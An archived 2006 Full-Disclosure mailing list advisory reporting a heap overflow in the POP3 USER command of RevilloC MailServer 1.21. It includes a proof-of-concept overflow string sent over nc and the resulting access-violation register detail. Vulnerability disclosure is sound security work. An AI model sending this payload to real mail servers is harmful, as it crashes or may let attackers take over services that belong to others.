[Full-disclosure] RevilloC mail server USER command heap overflow
- From: <securma@xxxxxxxx>
- Date: Tue, 7 Mar 2006 17:38:36 +0100
Revilloc mail server "USER" command heap overflow
Revilloc MailServer and Proxy v 1.21 (http://www.revilloC.com)
The mail server is a central point for emails coming in and going out from home or office
The service will work with any standard email client that supports POP3 and SMTP.
sending a large buffer after USER commands
C:\>nc 127.0.0.1 110
+OK RevilloC POP3 Ready
USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a"
causes access violation when reading [dddddddd].
7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX]--->EBX pointe to "\xdd"x4
14/01/2006 Vendor contacted,No response
no patch no solution...use another mail server
securma massine from MorX Security Research Team
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] dikline.com official message.
- Next by Date: [Full-disclosure] Re: PHP-based CMS mass-exploitation
- Previous by thread: [Full-disclosure] dikline.com official message.
- Next by thread: [Full-disclosure] PHP-based CMS mass-exploitation